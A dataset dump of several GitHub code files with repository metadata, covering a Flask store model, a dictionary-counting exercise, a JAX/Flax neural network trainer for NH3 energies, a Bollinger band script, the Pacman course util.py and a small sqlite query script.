blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07d7a9fbcc3f28e2e965359f30bdd4c646aa5d49 | ce0b0b3bc64b0adc0d3033b8e46e265affb840fe | /models/store.py | 11fb83dea72b54700ac6a9db997dc6670d8bd263 | [] | no_license | IvorryC/store-REST-API | 70a455cb36e50abbfddea84586ebe0e635d0cbcd | c392b50c2a10a219addc53356902206364038802 | refs/heads/master | 2023-03-31T13:26:43.971249 | 2021-04-06T16:52:18 | 2021-04-06T16:52:18 | 353,400,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | from db import db
class StoreModel(db.Model):
__tablename__ = 'stores'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80))
items = db.relationship('ItemModel', lazy='dynamic')
def __init__(self, name):
self.name = name
def json(self):
return {'name': self.name, 'items': [item.json() for item in self.items.all()]}
@classmethod
def find_by_name(cls, name):
return cls.query.filter_by(name=name).first() # SELECT * FROM items WHERE name=name LIMIT 1
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
| [
"79863144+IvorryC@users.noreply.github.com"
] | 79863144+IvorryC@users.noreply.github.com |
a40a4ecba8a0939b655fec9e42d09501ca7c15b8 | 75ea6a8ecdb4ecdc3ba4bb7e5ae4bac050ae2ec0 | /CalFoodNum.py | 721b65171564e70d40f714819859e6373ba617ef | [] | no_license | Jokertion/Automate-the-boring-stuff-with-python | 9a8ffe80fa7ee1a0d1dc8a9d961fa239d54ab172 | ab9c89a0e0325e9e0cf591bf525549aa0ec11336 | refs/heads/master | 2020-03-14T23:29:13.453501 | 2018-08-03T14:17:09 | 2018-08-03T14:17:09 | 131,846,205 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #计算不同客人带来的食物数量总数
#技能包:嵌套字典的调用
allGuests = {'Alice': {'apples':5, 'pretzes':12},
'Bob': {'ham sandwiches':3, 'apples':2},
'Carol': {'cups':3, 'apple pies':1}}
def totalBrought(guests,item):
numBrought = 0
#遍历guests的键值对,客人名字赋给k,带来的食物赋给v
for k, v in guests.items():
#如果带来的食物在键中,将值赋到numBrought中,如果不是键,get()方法返回0,添加到numBrouhgt.
numBrought = numBrought + v.get(item,0)
return numBrought
print ('Number of things being bought:')
print (' - Apples ' + str(totalBrought(allGuests, 'Apples')))
print (' - Cups ' + str(totalBrought(allGuests, 'cups')))
print (' - Cakes ' + str(totalBrought(allGuests, 'cakes')))
print (' - Ham sandwiches ' + str(totalBrought(allGuests, 'ham sandwiches')))
print (' - apple pies ' + str(totalBrought(allGuests, 'apple pies')))
| [
"noreply@github.com"
] | noreply@github.com |
c34a56a3b9059e6d0d4b4de947865f0f49f3cb74 | 76db78a7acad70c1b623e2f67fdffda619a82fee | /nn_grad_nh3_batch_flax_val_test.py | 20228e1ccc4b6c3fedd9a4ea78b341a37001a837 | [] | no_license | RodrigoAVargasHdz/ad_nn_grad_reg_opt_jax | fcd9350dc4139e0c47d6e522a18175bab6197d38 | bc3b4670b8903e351f2d47b02a58030ad88e2f6a | refs/heads/master | 2023-05-03T13:28:48.561134 | 2021-05-26T20:27:15 | 2021-05-26T20:27:15 | 369,264,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,541 | py | import os
import argparse
import time
import datetime
import itertools
import numpy.random as onpr
import jax
import jax.numpy as jnp
from jax import jit, vmap, random
from jax import value_and_grad, grad, jacfwd, jacrev
# from jax.experimental import optimizers
from jax.config import config
config.update("jax_debug_nans", True)
jax.config.update('jax_enable_x64', True)
from flax.core.frozen_dict import freeze, unfreeze,FrozenDict
from flax import serialization, jax_utils
from flax import linen as nn
from flax import optim
#ravh
from data import *
from flax_mlp import *
# mase to jax
# from monomials import f_monomials as f_mono
# from polynomials import f_polynomials as f_poly
Ha2cm = 220000
r_dir = 'Results_nn_adiab'
# --------------------------------
def load_data(file_results,N,l):
if os.path.isfile(file_results):
D = jnp.load(file_results,allow_pickle=True)
Dtr = D.item()['Dtr']
Dval = D.item()['Dval']
Dt = Data_nh3()
else:
Dtr,Dval,Dt = split_trainig_val_test_coup(N,l)
Xtr,gXtr,gXctr,ytr = Dtr
Dtr = (Xtr,gXtr,gXctr,ytr)
return Dtr,Dval,Dt
# ---------------------------------------------
def main_opt(N,l,i0,nn_arq,act_fun,n_epochs,lr,w_decay,rho_g):
start_time = time.time()
str_nn_arq = ''
for item in nn_arq:
str_nn_arq = str_nn_arq + '_{}'.format(item)
f_job = 'nn_arq{}_N_{}_i0_{}_l_{}_batch'.format(str_nn_arq,N,i0,l)
f_out = '{}/out_opt_{}.txt'.format(r_dir,f_job)
f_w_nn = '{}/W_{}.npy'.format(r_dir,f_job)
file_results = '{}/data_nh3_{}.npy'.format(r_dir,f_job)
# --------------------------------------
# Data
n_atoms = 4
batch_size = 768 #1024#768#512#256#128#64#32
Dtr,Dval,Dt = load_data(file_results,N,l)
Xtr,gXtr,gXctr,ytr = Dtr
Xval,gXval,gXcval, yval = Dval
Xt,gXt,gXct,yt = Dt
print(gXtr.shape,gXtr.shape,gXctr.shape,ytr.shape)
# --------------------------------
# BATCHES
n_complete_batches, leftover = divmod(N, batch_size)
n_batches = n_complete_batches + bool(leftover)
def data_stream():
rng = onpr.RandomState(0)
while True:
perm = rng.permutation(N)
for i in range(n_batches):
batch_idx = perm[i * batch_size:(i + 1) * batch_size]
yield Xtr[batch_idx],gXtr[batch_idx], gXctr[batch_idx], ytr[batch_idx]
batches = data_stream()
# --------------------------------
f = open(f_out,'a+')
print('-----------------------------------',file=f)
print('Starting time', file=f)
print(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), file=f)
print('-----------------------------------',file=f)
print(f_out,file=f)
print('N = {}, n_atoms = {}, data_random = {}, NN_random = {}'.format(N,n_atoms,l,i0),file=f)
print(nn_arq,file=f)
print('lr = {}, w decay = {}'.format(lr,w_decay),file=f)
print('Activation function = {}'.format(act_fun),file=f)
print('N Epoch = {}'.format(n_epochs),file=f)
print('rho G = {}'.format(rho_g),file=f)
print('-----------------------------------',file=f)
f.close()
# --------------------------------------
# initialize NN
nn_arq.append(3)
tuple_nn_arq = tuple(nn_arq)
nn_model = NN_adiab(n_atoms,tuple_nn_arq)
def get_init_NN_params(key):
x = Xtr[0,:]
x = x[None,:]# x = jnp.ones((1,Xtr.shape[1]))
variables = nn_model.init(key, x)
return variables
# Initilialize parameters
rng = random.PRNGKey(i0)
rng, subkey = jax.random.split(rng)
params = get_init_NN_params(subkey)
f = open(f_out,'a+')
if os.path.isfile(f_w_nn):
print('Reading NN parameters from prev calculation!',file=f)
print('-----------------------',file=f)
nn_dic = jnp.load(f_w_nn,allow_pickle=True)
params = unfreeze(params)
params['params'] = nn_dic.item()['params']
params = freeze(params)
# print(params)
f.close()
init_params = params
# --------------------------------------
# Phys functions
@jit
def nn_adiab(params,x):
y_ad_pred = nn_model.apply(params,x)
return y_ad_pred
@jit
def jac_nn_adiab(params,x):
g_y_pred = jacrev(nn_adiab,argnums=1)(params,x[None,:])
return jnp.reshape(g_y_pred,(2,g_y_pred.shape[-1]))
# --------------------------------------
# training loss functions
@jit
def f_loss_ad_energy(params,batch):
X_inputs,_,_,y_true = batch
y_pred = nn_adiab(params,X_inputs)
diff_y = y_pred - y_true #Ha2cm*
return jnp.linalg.norm(diff_y,axis=0)
@jit
def f_loss_jac(params,batch):
X_inputs, gX_inputs,_,y_true = batch
gX_pred = vmap(jac_nn_adiab,(None,0))(params,X_inputs)
diff_g_X = gX_pred - gX_inputs
# jnp.linalg.norm(diff_g_X,axis=0)
diff_g_X0 = diff_g_X[:,0,:]
diff_g_X1 = diff_g_X[:,1,:]
l0 = jnp.linalg.norm(diff_g_X0)
l1 = jnp.linalg.norm(diff_g_X1)
return jnp.stack([l0,l1])
# ------
@jit
def f_loss(params,rho_g,batch):
rho_g = jnp.exp(rho_g)
loss_ad_energy = f_loss_ad_energy(params,batch)
loss_jac_energy = f_loss_jac(params,batch)
loss = jnp.vdot(jnp.ones_like(loss_ad_energy),loss_ad_energy) + jnp.vdot(rho_g,loss_jac_energy)
return loss
# --------------------------------------
# Optimization and Training
# Perform a single training step.
@jit
def train_step(optimizer,rho_g,batch):#, learning_rate_fn, model
grad_fn = jax.value_and_grad(f_loss)
loss, grad = grad_fn(optimizer.target,rho_g,batch)
optimizer = optimizer.apply_gradient(grad) #, {"learning_rate": lr}
return optimizer, (loss, grad)
# @jit
def train(rho_g,nn_params):
optimizer = optim.Adam(learning_rate=lr,weight_decay=w_decay).create(nn_params)
optimizer = jax.device_put(optimizer)
train_loss = []
loss0 = 1E16
loss0_tot = 1E16
itercount = itertools.count()
f_params = init_params
for epoch in range(n_epochs):
for _ in range(n_batches):
optimizer, loss_and_grad = train_step(optimizer,rho_g,next(batches))
loss, grad = loss_and_grad
# f = open(f_out,'a+')
# print(i,loss,file=f)
# f.close()
train_loss.append(loss)
# params = optimizer.target
# loss_tot = f_validation(params)
nn_params = optimizer.target
return nn_params,loss_and_grad, train_loss
@jit
def val_step(optimizer,nn_params):#, learning_rate_fn, model
rho_g_prev = optimizer.target
nn_params, loss_and_grad_train, train_loss_iter = train(rho_g_prev,nn_params)
loss_train, grad_loss_train = loss_and_grad_train
grad_fn_val = jax.value_and_grad(f_loss, argnums=1)
loss_val, grad_val = grad_fn_val(nn_params,optimizer.target,Dval)
optimizer = optimizer.apply_gradient(grad_val) #, {"learning_rate": lr}
return optimizer, nn_params, (loss_val,loss_train,train_loss_iter), (grad_loss_train,grad_val)
# Initilialize rho_G
rng = random.PRNGKey(0)
rng, subkey = jax.random.split(rng)
rho_G0 = random.uniform(subkey,shape=(2,),minval=5E-4, maxval=0.025)
rho_G0 = jnp.log(rho_G0)
print('Initial lambdas',rho_G0)
init_G = rho_G0#
optimizer_out = optim.Adam(learning_rate=2E-4,weight_decay=0.).create(init_G)
optimizer_out = jax.device_put(optimizer_out)
f_params = init_params
for i in range(50000):
start_va_time = time.time()
optimizer_out, f_params, loss_all, grad_all = val_step(optimizer_out, f_params)
rho_g = optimizer_out.target
loss_val,loss_train,train_loss_iter = loss_all
grad_loss_train,grad_val = grad_all
loss0_tot = f_loss(f_params,rho_g,Dt)
dict_output = serialization.to_state_dict(f_params)
jnp.save(f_w_nn,dict_output)#unfreeze()
f = open(f_out,'a+')
# print(i,rho_g, loss0, loss0_tot, (time.time() - start_va_time),file=f)
print(i,loss_val,loss_train, (time.time() - start_va_time),file=f)
print(jnp.exp(rho_g), file=f)
print(grad_val, file=f)
# print(train_loss_iter ,file=f)
# print(grad_val,file=f)
# print(grad_loss_train,file=f)
f.close()
# --------------------------------------
# Prediction
f = open(f_out,'a+')
print('Prediction of the entire data set', file=f)
print('N = {}, n_atoms = {}, random = {}'.format(N,n_atoms,i0),file=f)
print('NN : {}'.format(nn_arq),file=f)
print('lr = {}, w decay = {}, rho G = {}'.format(lr,w_decay,rho_g),file=f)
print('Activation function = {}'.format(act_fun),file=f)
print('Total points = {}'.format(yt.shape[0]),file=f)
y_pred = nn_adiab(f_params, Xt)
gX_pred = vmap(jac_nn_adiab,(None,0))(f_params,Xt)
diff_y = y_pred - yt
rmse_Ha = jnp.linalg.norm(diff_y)
rmse_cm = jnp.linalg.norm(Ha2cm*diff_y)
mae_Ha = jnp.linalg.norm(diff_y,ord=1)
mae_cm = jnp.linalg.norm(Ha2cm*diff_y,ord=1)
print('RMSE = {} [Ha]'.format(rmse_Ha),file=f)
print('RMSE(tr) = {} [cm-1]'.format(loss0),file=f)
print('RMSE = {} [cm-1]'.format(rmse_cm),file=f)
print('MAE = {} [Ha]'.format(mae_Ha),file=f)
print('MAE = {} [cm-1]'.format(mae_cm),file=f)
Dpred = jnp.column_stack((Xt,y_pred))
data_dic = {'Dtr':Dtr,
'Dpred': Dpred,
'gXpred': gX_pred,
'loss_tr':loss0,
'error_full':rmse_cm,
'N':N,
'l':l,
'i0':i0,
'rho_g':rho_g}
jnp.save(file_results,data_dic)
print('---------------------------------', file=f)
print('Total time = %.6f seconds ---'% ((time.time() - start_time)), file=f)
print('---------------------------------', file=f)
f.close()
def main():
parser = argparse.ArgumentParser(description='opt PIP-NN')
parser.add_argument('--N', type=int, default=3500, help='initeger data')
parser.add_argument('--l', type=int, default=0, help='training data label')
parser.add_argument('--i', type=int, default=0, help='random integer NN')
parser.add_argument('--f', type=str, default='tanh',help='activation function' )
parser.add_argument('--lr', type=float, default=5E-4, help='learning rate')
parser.add_argument('--wdecay', type=float, default=1E-3, help='weight decay')
parser.add_argument('--lG', type=float, default=1E-2, help='lambda gradient')
parser.add_argument('--n_epoch', type=int, default=5000, help='number of epochs')
parser.add_argument('-nn', '--list', help='NN arq', type=str)
args = parser.parse_args()
i0 = args.i
l = args.l
N = args.N
nn_arq = [int(item) for item in args.list.split(',')]
act_fun = args.f
lr = args.lr
rho_g = args.lG
w_decay = args.wdecay
n_epochs = args.n_epoch
main_opt(N,l,i0,nn_arq,act_fun,n_epochs,lr,w_decay,rho_g)
'''
lr_ = jnp.array([5E-5])#2E-3,
for lr in lr_:
nn_arq = [int(item) for item in args.list.split(',')]
main_opt(N,l,i0,nn_arq,act_fun,n_epochs,lr,w_decay)
'''
if __name__ == "__main__":
main()
'''
start_time = time.time()
loss_val = f_validation(params)
loss_jac_val = f_jac_validation(params)
loss_nac_val = f_nac_validation(params)
print('Tot adiab energies loss = ', loss_val)
print('Tot jac adiab energies loss = ', loss_jac_val)
print('Tot nac loss = ', loss_nac_val)
print('Total time = %.6f seconds ---'% ((time.time() - start_time)))
assert 0
# norm_gXt = jnp.linalg.norm(gXt,axis=2)
# j0 = jnp.argmax(norm_gXt,axis=0)
# rho_g = 10.0*(jnp.amax(ytr))**2/jnp.vdot(norm_gXt[j0],norm_gXt[j0])
# --------------------------------------
# Validation loss functions
@jit
def f_validation(params):
y_pred = nn_adiab(params, Xt)
diff_y = y_pred - yt
z = jnp.linalg.norm(diff_y)
return z
@jit
def f_jac_validation(params):
gX_pred = vmap(jac_nn_adiab,(None,0))(params,Xt)
diff_y = gX_pred - gXt
z = jnp.linalg.norm(diff_y)
return z
'''
| [
"rvargas@v.cluster.local"
] | rvargas@v.cluster.local |
f66250f2efc426debd99c6fa3183d92c689f2d92 | 50220bca2bb555f4969b84bb494d18744bb7321d | /homework/hw5/bollinger.py | 8a411c2a8586c0290b3ee4dfe9b7d66d4c3716e0 | [] | no_license | afcarl/coursera-compinvesting1 | 83eee4ceaaeecdc772f8eb39d4a2e005a805d662 | 2129d9b7b03d0f6eb1b8dbbce91213b5112795f1 | refs/heads/master | 2020-08-22T15:08:43.140251 | 2017-03-26T18:45:44 | 2017-03-26T18:45:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,542 | py | #!/bin/python
import sys
import datetime as dt
import pandas as pd
import numpy as np
import QSTK.qstkutil.qsdateutil as du
import QSTK.qstkutil.DataAccess as da
# Input
# dt_start, dt_end, loopback_days
# Idea
# Keep three dataframes to contain the moving average, moving stddev and
# bollinger values
def fetch_close_prices(dt_start, dt_end, ls_symbols):
# Close is at 4 PM
ldt_timestamps = du.getNYSEdays(dt_start, dt_end, dt.timedelta(hours=16))
dataobj = da.DataAccess('Yahoo')
ls_keys = ['open', 'high', 'low', 'close', 'volume', 'actual_close']
ldf_data = dataobj.get_data(ldt_timestamps, ls_symbols, ls_keys)
d_data = dict(zip(ls_keys, ldf_data))
for s_key in ls_keys:
d_data[s_key] = d_data[s_key].fillna(method='ffill')
d_data[s_key] = d_data[s_key].fillna(method='bfill')
d_data[s_key] = d_data[s_key].fillna(1.0)
# Get the numpy dnarray of close prices
na_price = d_data['close'].values
# Convert to a dataframe
df_closingprices = pd.DataFrame(na_price, columns=ls_symbols, index=ldt_timestamps)
return df_closingprices
def build_bollinger_bands(df_closingprices, lookback_days):
# get the symbols of ot fhte data frame
ls_symbols = df_closingprices.columns.values
# print ls_symbols
# temporary empty np_array
na_tmp = np.zeros((len(df_closingprices.values), 0))
df_moving_avg = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_moving_stddev = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_upper = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_lower = pd.DataFrame(na_tmp, index=df_closingprices.index)
df_bollinger_value = pd.DataFrame(na_tmp, index=df_closingprices.index)
k = 1 # multiple of standard deviations
for symbol in ls_symbols:
# calculate the moving average
df_moving_avg[symbol] = df_closingprices[symbol].rolling(window=lookback_days, center=False).mean()
df_moving_stddev[symbol] = df_closingprices[symbol].rolling(window=lookback_days, center=False).std()
# @see http://stackoverflow.com/a/37668191
df_bollinger_upper[symbol] = df_moving_avg[symbol] + df_moving_stddev[symbol] * k
df_bollinger_lower[symbol] = df_moving_avg[symbol] - df_moving_stddev[symbol] * k
df_bollinger_value[symbol] = (df_closingprices[symbol] - df_moving_avg[symbol])/df_moving_stddev[symbol]
return df_moving_avg, df_moving_stddev, df_bollinger_upper, df_bollinger_lower, df_bollinger_value
def main():
dt_start = dt.datetime.strptime(sys.argv[1], '%m-%d-%Y')
dt_end = dt.datetime.strptime(sys.argv[2], '%m-%d-%Y')
n_lookback = int(sys.argv[3])
# print dt_start, dt_end, n_lookback
ls_symbols = ['AAPL', 'GOOG', 'IBM', 'MSFT']
df_closingprices = fetch_close_prices(dt_start, dt_end, ls_symbols)
# print df_closingprices
# build bollinger bands
df_moving_avg, df_moving_stddev, df_bollinger_upper, df_bollinger_lower, df_bollinger_value = build_bollinger_bands(df_closingprices, n_lookback)
# print "Moving Average\n", df_moving_avg
# print "Moving Stddev\n", df_moving_stddev
# print "Bollinger Upper\n", df_bollinger_upper
# print "Bollinger Lower\n", df_bollinger_lower
print "Bollinger Value\n", df_bollinger_value
if __name__ == '__main__':
if len(sys.argv) != 4:
print """ Usage: python bollinger.py start_date end_date lookback_days
Dates are in mm-dd-yyyy format
"""
sys.exit(0)
main()
| [
"brad@beaconhill.com"
] | brad@beaconhill.com |
9974261abc74319703ef35628bb1f321b6e39c26 | 84eaaa07532efbde535a52d29e8180dad357fbdd | /util.py | 60f219c5bbae0c0e7adf694df70663c56ce13229 | [] | no_license | jangwoopark/pacman-search | 3ade9823f2d21b70513d64993f4ce008931b6f4a | 7f88ba9c322b4af81979fef61cead4f19e9b9fdc | refs/heads/master | 2021-08-07T21:19:43.753609 | 2017-11-09T01:12:23 | 2017-11-09T01:12:23 | 110,048,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,222 | py | # util.py
# -------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
import sys
import inspect
import heapq, random
"""Data structures useful for implementing SearchAgents."""
class Stack:
"A container with a last-in-first-out (LIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Push 'item' onto the stack"
self.list.append(item)
def pop(self):
"Pop the most recently pushed item from the stack"
return self.list.pop()
def isEmpty(self):
"Returns true if the stack is empty"
return len(self.list) == 0
class Queue:
"A container with a first-in-first-out (FIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Enqueue the 'item' into the queue"
self.list.insert(0,item)
def pop(self):
""" Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def isEmpty(self):
"Returns true if the queue is empty"
return len(self.list) == 0
class PriorityQueue:
"""Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
def push(self, item, priority):
pair = (priority, item)
heapq.heappush(self.heap, pair)
def pop(self):
(priority, item) = heapq.heappop(self.heap)
return (priority, item) # this was modified from the original util.py
#return item
def isEmpty(self):
return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
"""Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priorityFunction):
"priorityFunction (item) -> priority"
self.priorityFunction = priorityFunction # store the priority function
PriorityQueue.__init__(self) # super-class initializer
def push(self, item):
"Adds an item to the queue with priority from the priority function"
PriorityQueue.push(self, item, self.priorityFunction(item))
def manhattanDistance( xy1, xy2 ):
"Returns the Manhattan distance between points xy1 and xy2"
return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] )
"""Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
"""A counter keeps track of counts for a set of keys.
The counter class is an extension of the standard python
dictionary type. It is specialized to have number values
(integers or floats), and includes a handful of additional
functions to ease the task of counting data. In particular,
all keys are defaulted to have value 0. Using a dictionary:
a = {}
print a['test']
would give an error, while the Counter class analogue:
>>> a = Counter()
>>> print a['test']
0
returns the default 0 value. Note that to reference a key
that you know is contained in the counter,
you can still use the dictionary syntax:
>>> a = Counter()
>>> a['test'] = 2
>>> print a['test']
2
This is very useful for counting things without initializing their counts,
see for example:
>>> a['blah'] += 1
>>> print a['blah']
1
The counter also includes additional functionality useful in implementing
the classifiers for this assignment. Two counters can be added,
subtracted or multiplied together. See below for details. They can
also be normalized and their total count and arg max can be extracted.
"""
def __getitem__(self, idx):
self.setdefault(idx, 0)
return dict.__getitem__(self, idx)
def incrementAll(self, keys, count):
"""Increments all elements of keys by the same count.
>>> a = Counter()
>>> a.incrementAll(['one','two', 'three'], 1)
>>> a['one']
1
>>> a['two']
1
"""
for key in keys:
self[key] += count
def argMax(self):
"""Returns the key with the highest value.
"""
if len(self.keys()) == 0: return None
all = self.items()
values = [x[1] for x in all]
maxIndex = values.index(max(values))
return all[maxIndex][0]
def sortedKeys(self):
"""Returns a list of keys sorted by their values. Keys
with the highest values will appear first.
>>> a = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> a['third'] = 1
>>> a.sortedKeys()
['second', 'third', 'first']
"""
sortedItems = self.items()
compare = lambda x, y: sign(y[1] - x[1])
sortedItems.sort(cmp=compare)
return [x[0] for x in sortedItems]
def totalCount(self):
"""Returns the sum of counts for all keys.
"""
return sum(self.values())
def normalize(self):
"""Edits the counter such that the total count of all
keys sums to 1. The ratio of counts for all keys
will remain the same. Note that normalizing an empty
Counter will result in an error.
"""
total = float(self.totalCount())
if total == 0: return
for key in self.keys():
self[key] = self[key] / total
def divideAll(self, divisor):
"""Divides all counts by divisor
"""
divisor = float(divisor)
for key in self:
self[key] /= divisor
def copy(self):
"""Returns a copy of the counter
"""
return Counter(dict.copy(self))
def __mul__(self, y ):
"""Multiplying two counters gives the dot product of their vectors where
each unique label is a vector element.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['second'] = 5
>>> a['third'] = 1.5
>>> a['fourth'] = 2.5
>>> a * b
14
"""
sum = 0
x = self
if len(x) > len(y):
x,y = y,x
for key in x:
if key not in y:
continue
sum += x[key] * y[key]
return sum
def __radd__(self, y):
"""Adding another counter to a counter increments the current counter
by the values stored in the second counter.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> a += b
>>> a['first']
1
"""
for key, value in y.items():
self[key] += value
def __add__( self, y ):
"""Adding two counters gives a counter with the union of all keys and
counts of the second added to counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a + b)['first']
1
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] + y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = y[key]
return addend
def __sub__( self, y ):
"""Subtracting a counter from another gives a counter with the union of all keys and
counts of the second subtracted from counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a - b)['first']
-5
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] - y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = -1 * y[key]
return addend
def raiseNotDefined():
print "Method not implemented: %s" % inspect.stack()[1][3]
sys.exit(1)
def normalize(vectorOrCounter):
"""normalize a vector or counter by dividing each value by the sum of all values
"""
normalizedCounter = Counter()
if type(vectorOrCounter) == type(normalizedCounter):
counter = vectorOrCounter
total = float(counter.totalCount())
if total == 0: return counter
for key in counter.keys():
value = counter[key]
normalizedCounter[key] = value / total
return normalizedCounter
else:
vector = vectorOrCounter
s = float(sum(vector))
if s == 0: return vector
return [el / s for el in vector]
def nSample(distribution, values, n):
if sum(distribution) != 1:
distribution = normalize(distribution)
rand = [random.random() for i in range(n)]
rand.sort()
samples = []
samplePos, distPos, cdf = 0,0, distribution[0]
while samplePos < n:
if rand[samplePos] < cdf:
samplePos += 1
samples.append(values[distPos])
else:
distPos += 1
cdf += distribution[distPos]
return samples
def sample(distribution, values = None):
if type(distribution) == Counter:
items = distribution.items()
distribution = [i[1] for i in items]
values = [i[0] for i in items]
if sum(distribution) != 1:
distribution = normalize(distribution)
choice = random.random()
i, total= 0, distribution[0]
while choice > total:
i += 1
total += distribution[i]
return values[i]
def sampleFromCounter(ctr):
items = ctr.items()
return sample([v for k,v in items], [k for k,v in items])
def getProbability(value, distribution, values):
"""Gives the probability of a value under a discrete distribution
defined by (distributions, values).
"""
total = 0.0
for prob, val in zip(distribution, values):
if val == value:
total += prob
return total
def flipCoin( p ):
r = random.random()
return r < p
def chooseFromDistribution( distribution ):
"Takes either a counter or a list of (prob, key) pairs and samples"
if type(distribution) == dict or type(distribution) == Counter:
return sample(distribution)
r = random.random()
base = 0.0
for prob, element in distribution:
base += prob
if r <= base: return element
def nearestPoint( pos ):
"""Finds the nearest grid point to a position (discretizes).
"""
( current_row, current_col ) = pos
grid_row = int( current_row + 0.5 )
grid_col = int( current_col + 0.5 )
return ( grid_row, grid_col )
def sign( x ):
"""Returns 1 or -1 depending on the sign of x
"""
if( x >= 0 ):
return 1
else:
return -1
def arrayInvert(array):
"""Inverts a matrix stored as a list of lists.
"""
result = [[] for i in array]
for outer in array:
for inner in range(len(outer)):
result[inner].append(outer[inner])
return result
def matrixAsList( matrix, value = True ):
"""Turns a matrix into a list of coordinates matching the specified value
"""
rows, cols = len( matrix ), len( matrix[0] )
cells = []
for row in range( rows ):
for col in range( cols ):
if matrix[row][col] == value:
cells.append( ( row, col ) )
return cells
def lookup(name, namespace):
"""Get a method or class from any imported module from its name.
Usage: lookup(functionName, globals())
"""
dots = name.count('.')
if dots > 0:
moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
module = __import__(moduleName)
return getattr(module, objName)
else:
modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
options = [getattr(module, name) for module in modules if name in dir(module)]
options += [obj[1] for obj in namespace.items() if obj[0] == name ]
if len(options) == 1: return options[0]
if len(options) > 1: raise Exception, 'Name conflict for %s'
raise Exception, '%s not found as a method or class' % name
def pause():
"""Pauses the output stream awaiting user feedback.
"""
print "<Press enter/return to continue>"
raw_input()
## code to handle timeouts
import signal
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
"timeout must be at least 1 second. WHY??"
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args):
if not 'SIGALRM' in dir(signal):
return self.function(*args)
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.timeout)
try:
result = self.function(*args)
finally:
signal.signal(signal.SIGALRM, old)
signal.alarm(0)
return result
| [
"noreply@github.com"
] | noreply@github.com |
a21a2341e1464df20cbe61e5ff72e72e222b92cc | 6c119f4bd4042672624e39d7fab80d922199f57a | /checkdb.py | fd98610741ef2ec08bac3311ed5adcc70d6eadef | [] | no_license | mkioga/39_python_RollingBack | 29ca1e17c13328611750f7a0fb6b0d4ee0575c72 | 27f0cfa913e35b2bfc34ad9ef54d364e39d06466 | refs/heads/master | 2020-03-27T19:59:51.008116 | 2018-09-01T20:11:08 | 2018-09-01T20:11:08 | 147,029,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,105 | py |
# ===========
# checkdb.py
# ===========
# We will try to get some input from the "history" table in "accounts" database
import sqlite3
db = sqlite3.connect("accounts.sqlite")
for row in db.execute("SELECT * FROM history"):
print(row)
db.close()
# When we run above code, we get this results. This is a tuple consisting of two strings (time, name) and an int (deposits)
